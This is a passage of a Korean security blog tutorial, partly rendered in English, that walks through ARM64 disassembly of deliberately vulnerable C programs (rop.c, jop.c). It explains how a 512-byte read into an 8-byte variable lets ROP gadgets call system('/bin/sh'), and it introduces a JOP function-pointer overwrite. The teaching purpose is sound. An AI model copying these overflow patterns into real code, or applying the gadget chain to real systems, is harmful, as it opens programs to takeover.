x0\n0x0000000000400450 &lt;+52>:\tldr\tw0, [x29, #44]\n0x0000000000400454 &lt;+56>:\tbl\t0x418fd8 &lt;read><\/pre>\n<\/div><\/div>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc9-1024x768.png\" alt=\"\" class=\"wp-image-2604\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc9-1024x768.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc9-300x225.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc9-768x576.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc9-1536x1153.png 1536w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc9-2048x1537.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">Explanation<\/h3>\n\n\n\n<p><strong>add x0, x29, #0x10<\/strong><br>To make a read parameter point at the u64 variable, <br>x0 is set to the x29 frame pointer value plus 16.<\/p>\n\n\n\n<p><strong>mov x2, #0x200<\/strong><br>To pass 512 as the third parameter of read,<br>the value 512 is stored in the x2 register.<\/p>\n\n\n\n<p><strong>mov x1, x0<\/strong><br>To make the <strong>second parameter<\/strong> of read point at the u64 variable,<br>the x0 register value is copied into the x1 register.<\/p>\n\n\n\n<p><strong>ldr w0, [x29, #44]<\/strong><br>The ldr instruction is load register: it reads a value from memory and stores it in a register.<br>To pass fd as the first parameter of read, <br>the 32-bit value (fd) located +44 bytes from the x29 frame pointer is read and stored in the &#8216;w0&#8217; register.<\/p>\n\n\n\n<p><strong>bl 0x418fd8 &lt;read&gt;<\/strong><br>Likewise, after read is called with the x0, x1, x2 parameters, <br>the return value of read is stored in the x0 register, and the buffer read in by read is stored at x29+16 (u64).<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Assembly<\/h3>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">0x0000000000400458 &lt;+60>:\tnop<\/pre>\n<\/div><\/div>\n\n\n\n<p>An instruction that does nothing.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Code<\/h3>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">}<\/pre>\n<\/div><\/div>\n\n\n\n<h3 class=\"wp-block-heading\">Assembly<\/h3>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">0x000000000040045c &lt;+64>:\tldp\tx29, x30, [sp], #48<\/pre>\n<\/div><\/div>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"989\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc10-1-1024x989.png\" alt=\"\" class=\"wp-image-2613\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc10-1-1024x989.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc10-1-300x290.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc10-1-768x742.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc10-1-1536x1484.png 1536w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc10-1-2048x1979.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">Explanation<\/h3>\n\n\n\n<p>The <code>LDP<\/code> instruction is &#8220;Load Pair&#8221;: <br>two 64-bit register values from memory as a pair 
\ub85c\ub4dc\uc2dc\ud0a8\ub2e4.<\/p>\n\n\n\n<p>\uba3c\uc800, \uc2a4\ud0dd\uc5d0\uc11c \ud504\ub808\uc784 \ud3ec\uc778\ud130 (<code>x29<\/code>)\uc640 \ub9c1\ud06c \ub808\uc9c0\uc2a4\ud130 (<code>x30<\/code>)(=lr) \uac12\uc744 sp+0, +8 \uc9c0\uc810\uc73c\ub85c\ubd80\ud130 \ub85c\ub4dc\ud558\uc5ec <br>\uc774\uc804 \ud568\uc218 \ud638\ucd9c\uc758 \uc0c1\ud0dc\ub97c \ubcf5\uc6d0\ud55c\ub2e4.<\/p>\n\n\n\n<p>\ub610, \uc2a4\ud0dd \ud3ec\uc778\ud130 sp\ub97c +48 \uc99d\uac00\uc2dc\ucf1c, <br>rop_bad_func \ud568\uc218 \ud638\ucd9c \uc804\uc758 \uc2a4\ud0dd \ud3ec\uc778\ud130\uc758 \uc704\uce58\ub85c \ub418\ub3cc\ub9b0\ub2e4.<\/p>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">\uc5b4\uc148\ube14\ub7ec<\/h3>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">ret<\/pre>\n<\/div><\/div>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"797\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc11-1024x797.png\" alt=\"\" class=\"wp-image-2614\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc11-1024x797.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc11-300x234.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc11-768x598.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc11-1536x1196.png 1536w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc11-2048x1594.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>RET \uba85\ub839\uc5b4\ub294 
\ub0b4\ubd80\uc801\uc73c\ub85c \uc544\ub798\uc640 \uac19\uc774 \uc218\ud589\ub41c\ub2e4.<br><strong>mov pc, lr<\/strong><\/p>\n\n\n\n<p>lr (=x30) \ub808\uc9c0\uc2a4\ud130 \uac12\uc73c\ub85c pc \ub808\uc9c0\uc2a4\ud130\uc5d0 \uc9c0\uc815\ud558\uc5ec<br>\ub2e4\uc2dc main \ud568\uc218\ub85c \ubcf5\uadc0\ud55c\ub2e4.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">\ucf54\ub4dc<\/h3>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">int main()\n{\n...\n\treturn 0;\n}<\/pre>\n<\/div><\/div>\n\n\n\n<h3 class=\"wp-block-heading\">\uc5b4\uc148\ube14\ub7ec<\/h3>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">0x0000000000400470 &lt;+12>:\tmov\tw0, #0x0\n0x0000000000400474 &lt;+16>:\tldp\tx29, x30, [sp], #16\n0x0000000000400478 &lt;+20>:\tret<\/pre>\n<\/div><\/div>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"757\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc12-1024x757.png\" alt=\"\" class=\"wp-image-2615\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc12-1024x757.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc12-300x222.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc12-768x568.png 768w, 
https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc12-1536x1136.png 1536w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc12-2048x1514.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">\uc124\uba85<\/h2>\n\n\n\n<p>main \ud568\uc218\uc758 \uc5d0\ud544\ub85c\uadf8 \uc5ed\ud560\uc744 \ud55c\ub2e4.<\/p>\n\n\n\n<p><strong>mov w0, #0x0<\/strong><br>main \ud568\uc218\uc758 \ubc18\ud658 \uac12\uc774 0\uc774\uae30\uc5d0 w0 \ub808\uc9c0\uc2a4\ud130\uac12\uc744 0\uc73c\ub85c \uc9c0\uc815\uc2dc\ud0a8\ub2e4.<\/p>\n\n\n\n<p><strong>ldp x29, x30, [sp], #16<\/strong><br>\ub9c8\ucc2c\uac00\uc9c0\ub85c, \uba3c\uc800 \uc2a4\ud0dd\uc5d0\uc11c \ud504\ub808\uc784 \ud3ec\uc778\ud130 (<code>x29<\/code>)\uc640 \ub9c1\ud06c \ub808\uc9c0\uc2a4\ud130 (<code>x30<\/code>)(=lr) \uac12\uc744 sp+0, +8 \uc9c0\uc810\uc73c\ub85c\ubd80\ud130 \ub85c\ub4dc\ud558\uc5ec <br>\uc774\uc804 \ud568\uc218 \ud638\ucd9c\uc758 \uc0c1\ud0dc\ub97c \ubcf5\uc6d0\ud55c\ub2e4.<br>\uadf8 \ub2e4\uc74c, \uc2a4\ud0dd \ud3ec\uc778\ud130 sp\ub97c +16 \uc99d\uac00\uc2dc\ucf1c, <br>main \ud568\uc218 \ud638\ucd9c \uc804\uc758 \uc2a4\ud0dd \ud3ec\uc778\ud130\uc758 \uc704\uce58\ub85c \ub418\ub3cc\ub9b0\ub2e4.<\/p>\n\n\n\n<p><strong>ret<\/strong><br>pc \ub808\uc9c0\uc2a4\ud130\uc5d0 lr (=x30) \ub808\uc9c0\uc2a4\ud130 \uac12\uc73c\ub85c \uc9c0\uc815\ud558\uc5ec<br>main \uc774\uc804 \ud568\uc218\ub85c \ubcf5\uadc0\ud55c\ub2e4.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">2. 
ROP \uacf5\uaca9 \uc774\ud574\ud558\uae30<\/h2>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">void rop_bad_func()\n{\n\tchar data[16] = {0}; \n\tunsigned long long u64 = 0; \n\tint fd = 0; \n\tfd = open(\".\/rop.data\",O_RDONLY); \n\tread(fd,&amp;u64,512);\n}<\/pre>\n<\/div><\/div>\n\n\n\n<p>\ubcf4\ub2e4\uc2dc\ud53c read \ud568\uc218\ub97c \ucf54\ub4dc\ub97c \ubcf4\uba74 \ud560\ub2f9\ub41c 8\ubc14\uc774\ud2b8 \ud06c\uae30\uc758 u64 \ubcc0\uc218\uc5d0 512\ubc14\uc774\ud2b8 \ub9cc\ud07c \uc785\ub825\ubc1b\uc744 \uc218 \uc788\uc5b4<br>\ubc84\ud37c \uc624\ubc84\ud50c\ub85c\uc6b0 \ucde8\uc57d\uc810\uc774 \ubc1c\uc0dd\ud55c\ub2e4.<\/p>\n\n\n\n<p>rop.data \ud30c\uc77c\uc744 open, <br>read \ud568\uc218\uac00 \uc218\ud589\ub418\uace0 \ub09c \ub4a4\uc758 \uc2a4\ud0dd\uc744 \uc0b4\ud3b4\ubcf4\uba74 \uc544\ub798\uc640 \uac19\ub2e4.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"692\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc13-1024x692.png\" alt=\"\" class=\"wp-image-2618\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc13-1024x692.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc13-300x203.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc13-768x519.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc13-1536x1039.png 1536w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc13-2048x1385.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\uc6b0\uc120\uc740 main \ud568\uc218\uac00 \ub05d\ub098\uace0 \ub098\uba74, 
0x44f02c \uc8fc\uc18c\ub85c \ubcf5\uadc0\ud558\uac8c \ub41c\ub2e4.<br>0x44f02 \uc5b4\uc148\ube14\ub7ec \ucf54\ub4dc\ub294 \ub2e4\uc74c\uacfc \uac19\ub2e4.<\/p>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">...\n0x000000000044f02c &lt;+220>:\tldr\tx19, [sp, #16]\n0x000000000044f030 &lt;+224>:\tldp\tx29, x30, [sp], #48\n0x000000000044f034 &lt;+228>:\tret<\/pre>\n<\/div><\/div>\n\n\n\n<p>0x44f02 \uc8fc\uc18c\uc5d0 \ube0c\ub808\uc774\ud06c\ud3ec\uc778\ud2b8\ub97c \uac78\uace0, <br>\uc704 \uc5b4\uc148\ube14\ub9ac \ucf54\ub4dc\uac00 \uc2e4\ud589\ub418\uae30 \uc804\uc758 \uc2a4\ud0dd \uad6c\uc870\ub294 \uc544\ub798\uc640 \uac19\ub2e4.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"739\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc14-1024x739.png\" alt=\"\" class=\"wp-image-2621\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc14-1024x739.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc14-300x216.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc14-768x554.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc14-1536x1108.png 1536w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc14-2048x1478.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<p>\uc544\ub798 \uba85\ub839\uc5b4\ub4e4\uc744 \uc218\ud589\ud574\ubcf4\uba74 \uc758\ubbf8\ub294 \ub2e4\uc74c\uacfc 
\uac19\ub2e4.<\/p>\n\n\n\n<p><strong>ldr x19, [sp, #16]<\/strong><br>sp\uc5d0\uc11c +16\ubc14\uc774\ud2b8\ub9cc\ud07c \ub5a8\uc5b4\uc9c4 \uc704\uce58\uc5d0 \uc788\ub294 0x450d10 \uc8fc\uc18c\uc5d0 \uc788\ub294 \uac12\uc744 \uc77d\uc5b4\uc640\uc11c x19 \ub808\uc9c0\uc2a4\ud130\uc5d0 \uc800\uc7a5\ud55c\ub2e4.<\/p>\n\n\n\n<p><strong>ldp x29, x30, [sp], #48<\/strong><br>\ud504\ub808\uc784 \ud3ec\uc778\ud130 (<code>x29<\/code>)\ub97c \ub9c1\ud06c \ub808\uc9c0\uc2a4\ud130 (<code>x30<\/code>(= lr)) \uac12\uc744 (\ucd5c\uadfc) sp+0, sp+8\uc9c0\uc810\uc73c\ub85c\ubd80\ud130 \ub85c\ub4dc\ud558\uae30 \ub54c\ubb38\uc5d0<br>x29 \ub808\uc9c0\uc2a4\ud130\uac12\uc740 0xffffffffffffffff, x30 (= lr) \ub808\uc9c0\uc2a4\ud130\uac12\uc740 0x44f080\uc774 \ub41c\ub2e4.<br>\uadf8 \ub2e4\uc74c, \uc2a4\ud0dd \ud3ec\uc778\ud130 sp\ub97c +48\ub9cc\ud07c \uc99d\uac00\uc2dc\ud0a8\ub2e4<\/p>\n\n\n\n<p>0x44f02f \uac00\uc82f\uc774 \uc2e4\ud589\ub418\uace0 \ub09c \ub4a4 (ret \uc218\ud589 \uc804) \uc758 \uc2a4\ud0dd \uad6c\uc870\ub294 \ub2e4\uc74c\uacfc \uac19\ub2e4.<\/p>\n<\/div><\/div>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"739\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc15-1-1024x739.png\" alt=\"\" class=\"wp-image-2625\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc15-1-1024x739.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc15-1-300x216.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc15-1-768x554.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc15-1-1536x1108.png 1536w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc15-1-2048x1478.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>ret\uc774 \uc218\ud589\ub418\uace0 \ub09c\ub4a4\uc5d0\ub294 \uc774\uc81c pc \ub808\uc9c0\uc2a4\ud130\uac12\uc774 0x44f080\uac00 \ub420 \uac83\uc774\ub2e4.<br>0x44f080 
\uc8fc\uc18c\uc5d0 \uc788\ub294 \uac00\uc82f\ub3c4 \uc0b4\ud3b4\ubcf4\uba74,,<\/p>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">0x000000000044f080 &lt;+304>:\tmov\tx0, x19\n0x000000000044f084 &lt;+308>:\tldr\tx19, [sp, #16]\n0x000000000044f088 &lt;+312>:\tldp\tx29, x30, [sp], #48\n0x000000000044f08c &lt;+316>:\tret<\/pre>\n<\/div><\/div>\n\n\n\n<p>0x44f02f \uac00\uc82f\uc774 \uc2e4\ud589\ub418\uace0 \ub09c \ub4a4 (ret \uc218\ud589 \uc804) \uc758 \uc2a4\ud0dd \uad6c\uc870\ub294 \ub2e4\uc74c\uacfc \uac19\ub2e4.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"739\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc16-1024x739.png\" alt=\"\" class=\"wp-image-2626\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc16-1024x739.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc16-300x216.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc16-768x554.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc16-1536x1108.png 1536w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc16-2048x1478.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p><strong>mov x0, x19<\/strong><br>x19 \ub808\uc9c0\uc2a4\ud130\uac12\uc774 x0 \ub808\uc9c0\uc2a4\ud130\ub85c \ubcf5\uc0ac\ub41c\ub2e4.<br>\ub530\ub77c\uc11c x0 \ub808\uc9c0\uc2a4\ud130\uac12\uc740 &#8220;\/bin\/sh&#8221; \ubb38\uc790\uc5f4 \uc8fc\uc18c\ub97c \uac00\uc9c0\uac8c \ub41c\ub2e4.<\/p>\n\n\n\n<p><strong>ldr x19, [sp, #16]<\/strong><br>(\ucd5c\uadfc) sp\uc5d0\uc11c 
+16\ubc14\uc774\ud2b8\ub9cc\ud07c \ub5a8\uc5b4\uc9c4 \uc704\uce58\uc5d0 \uc788\ub294 0x7ffffff340 \uc8fc\uc18c\uc5d0 \uc788\ub294 \uac12\uc744 \uc77d\uc5b4\uc640\uc11c x19 \ub808\uc9c0\uc2a4\ud130\uc5d0 \uc800\uc7a5\ud55c\ub2e4.<br>\ub530\ub77c\uc11c x19 \ub808\uc9c0\uc2a4\ud130\uac12\uc740 0xffffffffffffffff\uac00 \ub41c\ub2e4.<\/p>\n\n\n\n<p><strong>ldp x29, x30, [sp], #48<\/strong><br>\ud504\ub808\uc784 \ud3ec\uc778\ud130 (<code>x29<\/code>)\ub97c \ub9c1\ud06c \ub808\uc9c0\uc2a4\ud130 (<code>x30<\/code>(= lr)) \uac12\uc744 (\ucd5c\uadfc) sp+0, sp+8\uc9c0\uc810\uc73c\ub85c\ubd80\ud130 \ub85c\ub4dc\ud558\uae30 \ub54c\ubb38\uc5d0<br>x29 \ub808\uc9c0\uc2a4\ud130\uac12\uc740 0xffffffffffffffff, x30 (= lr) \ub808\uc9c0\uc2a4\ud130\uac12\uc740 0x406ae8\uc774 \ub41c\ub2e4.<br>\uadf8 \ub2e4\uc74c, \uc2a4\ud0dd \ud3ec\uc778\ud130 sp\ub97c +48\ub9cc\ud07c \uc99d\uac00\uc2dc\ud0a8\ub2e4.<\/p>\n\n\n\n<p>\uc5ec\uae30\uae4c\uc9c0 \uc218\ud589\ud55c \ud6c4, ret\uc744 \uc218\ud589\ud558\uba74 <br>LR \ub808\uc9c0\uc2a4\ud130 \uac12\uc740 \uace7 pc \ub808\uc9c0\uc2a4\ud130\uac12\uc774 \ub418\uba70, LR \uac12\uc740 0x406ae8\uc778 system \ud568\uc218 \uc8fc\uc18c, <br>x0 \ub808\uc9c0\uc2a4\ud130\uac12\uc740 &#8220;\/bin\/sh&#8221; \ubb38\uc790\uc5f4 \uc8fc\uc18c\ub97c \uac00\uc9c0\uac8c \ub418\ubbc0\ub85c,<br>system(&#8220;\/bin\/sh&#8221;) \ud568\uc218\uac00 \ud638\ucd9c\ub418\uba74\uc11c \uc258\uc774 \ub530\uc9c0\uac8c \ub418\ub294 \uac83\uc774\ub2e4.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h1 class=\"wp-block-heading\">JOP<\/h1>\n\n\n\n<p><strong>jop.c<\/strong><\/p>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" 
data-enlighter-group=\"\">#include &lt;stdio.h>\n#include &lt;fcntl.h>\n#include &lt;unistd.h>\n#include &lt;stdlib.h>\n\ntypedef void (*jop_func_t)(); \n\nvoid jop_symbol()\n{\n\tsystem(\"\/bin\/ls\");\n}\n\nvoid jop_bad_func()\n{\n\tjop_func_t func = NULL;\n\tchar data[16] = {0}; \n\tunsigned long long u64 = 0; \n\tint fd = 0; \n\n\tfd = open(\".\/jop.data\",O_RDONLY); \n\tfunc = jop_symbol;\n\tread(fd,&amp;u64,512);\n\tfunc();\n}\n\nint main()\n{\n\tjop_bad_func();\n\treturn 0;\n}<\/pre>\n<\/div><\/div>\n\n\n\n<p>IDA\uc5d0\uc11c \ub514\ucef4\ud30c\uc77c\uc2dc\ucf1c \uc2a4\ud0dd \uc624\ud504\uc14b\uc744 \ud655\uc778\ud574\ubcf4\uba74 \uc544\ub798\uc640 \uac19\uace0,<\/p>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">void __cdecl jop_bad_func()\n{\n  unsigned __int64 u64; \/\/ [xsp+18h] [xbp+18h] BYREF\n  unsigned __int8 data[16]; \/\/ [xsp+20h] [xbp+20h] BYREF\n  int fd; \/\/ [xsp+34h] [xbp+34h]\n  jop_func_t func; \/\/ [xsp+38h] [xbp+38h]\n...<\/pre>\n<\/div><\/div>\n\n\n\n<p>jop.data \ud30c\uc77c \ub0b4\uc6a9\uc73c\ub85c \ubc84\ud37c \uc624\ubc84\ud50c\ub85c\uc6b0\ub97c \ubc1c\uc0dd\uc2dc\ud0a4\uba74 <br>\uc2a4\ud0dd \ub0b4\uc6a9\uc740 \uc544\ub798\uc640 \uac19\uc774 \ubcc0\ud558\uac8c \ub41c\ub2e4.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"699\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/06\/\uadf8\ub9bc17-1-1024x699.png\" alt=\"\" class=\"wp-image-2633\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/06\/\uadf8\ub9bc17-1-1024x699.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/06\/\uadf8\ub9bc17-1-300x205.png 300w, 
https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/06\/\uadf8\ub9bc17-1-768x524.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/06\/\uadf8\ub9bc17-1-1536x1048.png 1536w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/06\/\uadf8\ub9bc17-1-2048x1397.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\ubcf4\ub2e4\uc2dc\ud53c func \uc8fc\uc18c\uc5d0 \uc788\ub358 \uc790\ub9ac\uac00 0x441d84\uac12\uc73c\ub85c \ub36e\uc5b4\uc4f0\uc774\uac8c \ub418\uba74\uc11c,<br>\uc774\uc81c func() \ud568\uc218\ub97c \ud638\ucd9c\ud558\ub824\uace0 \ud558\uba74, 0x441d84 \uac00\uc82f \ucf54\ub4dc\uac00 \uc2e4\ud589\ub41c\ub2e4.<\/p>\n\n\n\n<p>\ucf54\ub4dc\ub294 \uc544\ub798\uc640 \uac19\ub2e4.<\/p>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" 